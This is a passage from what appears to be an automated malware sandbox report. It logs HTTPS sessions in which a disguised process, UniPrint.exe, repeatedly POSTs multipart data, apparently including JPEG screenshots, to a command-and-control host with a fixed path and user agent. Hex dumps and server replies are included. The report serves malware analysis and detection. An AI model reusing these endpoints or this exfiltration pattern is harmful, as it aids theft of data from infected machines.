                                                                                                      2021-09-15 11:46:14 UTC1399OUTData Raw: 52 c3 3e ad 23 27 14 f1 1b 9e 02 93 f8 56 89 d4 b4 f8 ff 00 d5 da 93 f5 a4 3a e0 5f f5 56 b1 8f ad 1e d2 a3 da 21 ec 29 ad e4 54 5b 49 db a4 67 f2 ab 76 9a 6d c7 9a 18 a1 eb 51 b6 bb 74 7e e8 45 fa 0a 62 6a b7 8f 22 e6 53 82 7b 0a 99 2a cd 1a 53 54 23 25 bb 2e 78 cd 76 c3 6a 0f a5 72 fa 7f fc 84 6d ff 00 eb a2 d7 4d e3 12 5a da d0 9e a5 6b 99 d3 ff 00 e4 23 6f ff 00 5d 07 f3 a5 87 fe 01 d7 5b f8 c7 a1 6a 29 6e 66 0d 34 a1 4e 3a 55 23 36 9b 1f 57 26 ab 78 90 91 7a b8 3f c3 58 bd 7b d6 14 28 73 41 36 c9 c4 e3 39 2a 38 a8 9d 01 d4 f4 f4 fb 91 13 4c 3a e4 4b fe ae dc 56 15 15 ba c2 c3 a9 c8 f1 f5 7a 1b 0d af cd fc 11 a8 a8 1f 59 bb 6e 8d 8f a5 67 51 54 b0 f4 d7 43 27 8b ac fa 96 db 50 b9 7f bd 2b 7e 74 df 3a 46 ea e4 fe 35 5e 9c b5 7e ce 2b 64 4a ad 37 bb 25
                                                                                                      Data Ascii: R>#'V:_V!)T[IgvmQt~Ebj"S{*ST#%.xvjrmMZk#o][j)nf4N:U#6W&xz?X{(sA69*8L:KVzYngQTC'P+~t:F5^~+dJ7%
                                                                                                      2021-09-15 11:46:14 UTC1415OUTData Raw: 4a 5a 28 01 28 a2 8a 00 28 a2 8a 00 5a 29 28 a0 05 a5 a6 d2 d0 21 69 28 a2 80 17 34 52 51 40 0b 45 25 14 00 b4 51 45 00 2d 14 94 b4 c4 14 b4 94 53 00 a2 8a 29 00 51 45 14 00 51 45 14 00 52 d2 51 40 0b 45 25 2d 30 0a 28 a2 81 0b 45 25 14 00 b4 52 51 40 0b 45 25 14 00 b4 51 45 00 14 51 45 31 0b 49 45 14 00 b4 51 45 00 14 51 45 00 14 51 45 00 2d 14 82 96 98 82 96 92 8c d0 02 d1 49 9a 28 01 68 cd 25 14 00 b9 a2 92 96 81 05 14 51 40 05 2d 25 2d 30 0a 5a 4a 28 01 7b d1 45 14 00 51 49 4b 4c 05 a2 92 8a 04 2d 14 94 b4 00 b4 52 51 4c 42 d1 45 14 00 b4 94 66 8a 00 5a 28 a2 80 0a 5a 4a 28 01 68 14 94 b4 c4 2d 19 a4 a2 98 85 cd 19 a4 a2 80 1d 9a 29 b4 b4 5c 2c 2d 19 a4 cd 26 68 b8 58 76 68 cd 37 34 51 70 b0 fc d1 9a 6d 19 a7 71 58 76 69 33 4d a5 cd 2b 8e c2 e6 97 34
                                                                                                      Data Ascii: JZ(((Z)(!i(4RQ@E%QE-S)QEQERQ@E%-0(E%RQ@E%QEQE1IEQEQEQE-I(h%Q@-%-0ZJ({EQIKL-RQLBEfZ(ZJ(h-)\,-&hXvh74QpmqXvi3M+4
                                                                                                      2021-09-15 11:46:14 UTC1425OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 39 37 34 34 34 37 30 30 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2197444700--
                                                                                                      2021-09-15 11:46:15 UTC1425INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:14 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=767c8afad45cf6433af0e5e24d8c8a3c2ef6dbdfed1900b5f91c2f28482e82da; expires=Thu, 15-Sep-2022 11:46:14 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:15 UTC1426INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      18192.168.2.34980545.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:15 UTC1426OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76633
                                                                                                      Content-Type: multipart/form-data; boundary=--------327613734
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:15 UTC1426OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 32 37 36 31 33 37 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------327613734Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:15 UTC1426OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 e7 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:15 UTC1426OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:15 UTC1442OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:15 UTC1458OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:15 UTC1474OUTData Raw: 3e ad 23 27 14 f1 1b 9e 02 93 f8 56 89 d4 b4 f8 ff 00 d5 da 93 f5 a4 3a e0 5f f5 56 b1 8f ad 1e d2 a3 da 21 ec 29 ad e4 54 5b 49 db a4 67 f2 ab 76 9a 6d c7 9a 18 a1 eb 51 b6 bb 74 7e e8 45 fa 0a 62 6a b7 8f 22 e6 53 82 7b 0a 99 2a cd 1a 53 54 23 25 bb 2e 78 cd 76 c3 6a 0f a5 72 fa 7f fc 84 6d ff 00 eb a2 d7 4d e3 12 5a da d0 9e a5 6b 99 d3 ff 00 e4 23 6f ff 00 5d 07 f3 a5 87 fe 01 d7 5b f8 c7 a1 6a 29 6e 66 0d 34 a1 4e 3a 55 23 36 9b 1f 57 26 ab 78 90 91 7a b8 3f c3 58 bd 7b d6 14 28 73 41 36 c9 c4 e3 39 2a 38 a8 9d 01 d4 f4 f4 fb 91 13 4c 3a e4 4b fe ae dc 56 15 15 ba c2 c3 a9 c8 f1 f5 7a 1b 0d af cd fc 11 a8 a8 1f 59 bb 6e 8d 8f a5 67 51 54 b0 f4 d7 43 27 8b ac fa 96 db 50 b9 7f bd 2b 7e 74 df 3a 46 ea e4 fe 35 5e 9c b5 7e ce 2b 64 4a ad 37 bb 25 dc 4f
                                                                                                      Data Ascii: >#'V:_V!)T[IgvmQt~Ebj"S{*ST#%.xvjrmMZk#o][j)nf4N:U#6W&xz?X{(sA69*8L:KVzYngQTC'P+~t:F5^~+dJ7%O
                                                                                                      2021-09-15 11:46:15 UTC1490OUTData Raw: 28 01 28 a2 8a 00 28 a2 8a 00 5a 29 28 a0 05 a5 a6 d2 d0 21 69 28 a2 80 17 34 52 51 40 0b 45 25 14 00 b4 51 45 00 2d 14 94 b4 c4 14 b4 94 53 00 a2 8a 29 00 51 45 14 00 51 45 14 00 52 d2 51 40 0b 45 25 2d 30 0a 28 a2 81 0b 45 25 14 00 b4 52 51 40 0b 45 25 14 00 b4 51 45 00 14 51 45 31 0b 49 45 14 00 b4 51 45 00 14 51 45 00 14 51 45 00 2d 14 82 96 98 82 96 92 8c d0 02 d1 49 9a 28 01 68 cd 25 14 00 b9 a2 92 96 81 05 14 51 40 05 2d 25 2d 30 0a 5a 4a 28 01 7b d1 45 14 00 51 49 4b 4c 05 a2 92 8a 04 2d 14 94 b4 00 b4 52 51 4c 42 d1 45 14 00 b4 94 66 8a 00 5a 28 a2 80 0a 5a 4a 28 01 68 14 94 b4 c4 2d 19 a4 a2 98 85 cd 19 a4 a2 80 1d 9a 29 b4 b4 5c 2c 2d 19 a4 cd 26 68 b8 58 76 68 cd 37 34 51 70 b0 fc d1 9a 6d 19 a7 71 58 76 69 33 4d a5 cd 2b 8e c2 e6 97 34 da 4c
                                                                                                      Data Ascii: (((Z)(!i(4RQ@E%QE-S)QEQERQ@E%-0(E%RQ@E%QEQE1IEQEQEQE-I(h%Q@-%-0ZJ({EQIKL-RQLBEfZ(ZJ(h-)\,-&hXvh74QpmqXvi3M+4L
                                                                                                      2021-09-15 11:46:15 UTC1501OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 32 37 36 31 33 37 33 34 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------327613734--
                                                                                                      2021-09-15 11:46:16 UTC1501INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:15 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=6b11d2c9c96c12b2f73a55eb7b675b9c543bf39010f8901646e662fd86e0db1d; expires=Thu, 15-Sep-2022 11:46:15 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:16 UTC1501INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      19192.168.2.34980645.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:16 UTC1501OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76617
                                                                                                      Content-Type: multipart/form-data; boundary=--------3156620313
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:16 UTC1502OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 31 35 36 36 32 30 33 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3156620313Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:16 UTC1502OUTData Raw: 7f 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 8b d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee 98 ef 4d 77 7d 78 7d 40 d3 6d 60 3b ea 5f 32 bb b0
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[DMw}x}@m`;_2
                                                                                                      2021-09-15 11:46:16 UTC1502OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:16 UTC1518OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:16 UTC1534OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:16 UTC1550OUTData Raw: 9e 97 b7 ec 99 4b 0c fa b4 8c 9c 53 c4 6e 78 0a 4f e1 5a 27 52 d3 e3 ff 00 57 6a 4f d6 90 eb 81 7f d5 5a c6 3e b4 7b 4a 8f 68 87 b0 a6 b7 91 51 6d 27 6e 91 9f ca ad da 69 b7 1e 68 62 87 ad 46 da ed d1 fb a1 17 e8 29 89 aa de 3c 8b 99 4e 09 ec 2a 64 ab 34 69 4d 50 8c 96 ec b9 e3 35 db 0d a8 3e 95 cb e9 ff 00 f2 11 b7 ff 00 ae 8b 5d 37 8c 49 6b 6b 42 7a 95 ae 67 4f ff 00 90 8d bf fd 74 1f ce 96 1f f8 07 5d 6f e3 1e 85 a8 a5 b9 98 34 d2 85 38 e9 54 8c da 6c 7d 5c 9a ad e2 42 45 ea e0 ff 00 0d 62 f5 ef 58 50 a1 cd 04 db 27 13 8c e4 a8 e2 a2 74 07 53 d3 d3 ee 44 4d 30 eb 91 2f fa bb 71 58 54 56 eb 0b 0e a7 23 c7 d5 e8 6c 36 bf 37 f0 46 a2 a0 7d 66 ed ba 36 3e 95 9d 45 52 c3 d3 5d 0c 9e 2e b3 ea 5b 6d 42 e5 fe f4 ad f9 d3 7c e9 1b ab 93 f8 d5 7a 72 d5 fb 38 ad
                                                                                                      Data Ascii: KSnxOZ'RWjOZ>{JhQm'nihbF)<N*d4iMP5>]7IkkBzgOt]o48Tl}\BEbXP'tSDM0/qXTV#l67F}f6>ER].[mB|zr8
                                                                                                      2021-09-15 11:46:16 UTC1566OUTData Raw: 51 45 00 14 51 45 30 16 8a 4a 28 01 69 29 68 a0 04 a2 8a 28 00 a2 8a 28 01 68 a4 a2 80 16 96 9b 4b 40 85 a4 a2 8a 00 5c d1 49 45 00 2d 14 94 50 02 d1 45 14 00 b4 52 52 d3 10 52 d2 51 4c 02 8a 28 a4 01 45 14 50 01 45 14 50 01 4b 49 45 00 2d 14 94 b4 c0 28 a2 8a 04 2d 14 94 50 02 d1 49 45 00 2d 14 94 50 02 d1 45 14 00 51 45 14 c4 2d 25 14 50 02 d1 45 14 00 51 45 14 00 51 45 14 00 b4 52 0a 5a 62 0a 5a 4a 33 40 0b 45 26 68 a0 05 a3 34 94 50 02 e6 8a 4a 5a 04 14 51 45 00 14 b4 94 b4 c0 29 69 28 a0 05 ef 45 14 50 01 45 25 2d 30 16 8a 4a 28 10 b4 52 52 d0 02 d1 49 45 31 0b 45 14 50 02 d2 51 9a 28 01 68 a2 8a 00 29 69 28 a0 05 a0 52 52 d3 10 b4 66 92 8a 62 17 34 66 92 8a 00 76 68 a6 d2 d1 70 b0 b4 66 93 34 99 a2 e1 61 d9 a3 34 dc d1 45 c2 c3 f3 46 69 b4 66 9d c5
                                                                                                      Data Ascii: QEQE0J(i)h((hK@\IE-PERRRQL(EPEPKIE-(-PIE-PEQE-%PEQEQERZbZJ3@E&h4PJZQE)i(EPE%-0J(RRIE1EPQ(h)i(RRfb4fvhpf4a4EFif
                                                                                                      2021-09-15 11:46:16 UTC1576OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 31 35 36 36 32 30 33 31 33 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3156620313--
                                                                                                      2021-09-15 11:46:17 UTC1576INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:16 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=3b273b46ce5cf5dc200b46f28ab0ccde5258bf96ac765c838fa97470de9ddd89; expires=Thu, 15-Sep-2022 11:46:17 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:17 UTC1577INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      2192.168.2.34975445.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:27 UTC150OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 81223
                                                                                                      Content-Type: multipart/form-data; boundary=--------1733772180
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:27 UTC150OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 37 33 33 37 37 32 31 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1733772180Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:27 UTC150OUTData Raw: 59 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 ef c4 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee ca 9a 10 4e 0f 72 10 20 82 3b 3c 54 aa 1e 5f ee c8 ff 2a 88 63 f3 be db 5f c5 c6 3d 26 b3 58 91 09 97 15 60 fe 43 e5 1b 64 51 4d
                                                                                                      Data Ascii: YiPS4\DB.${Owe0E_J4f,?:M2gA[DNr ;<T_*c_=&X`CdQM
                                                                                                      2021-09-15 11:45:27 UTC151OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
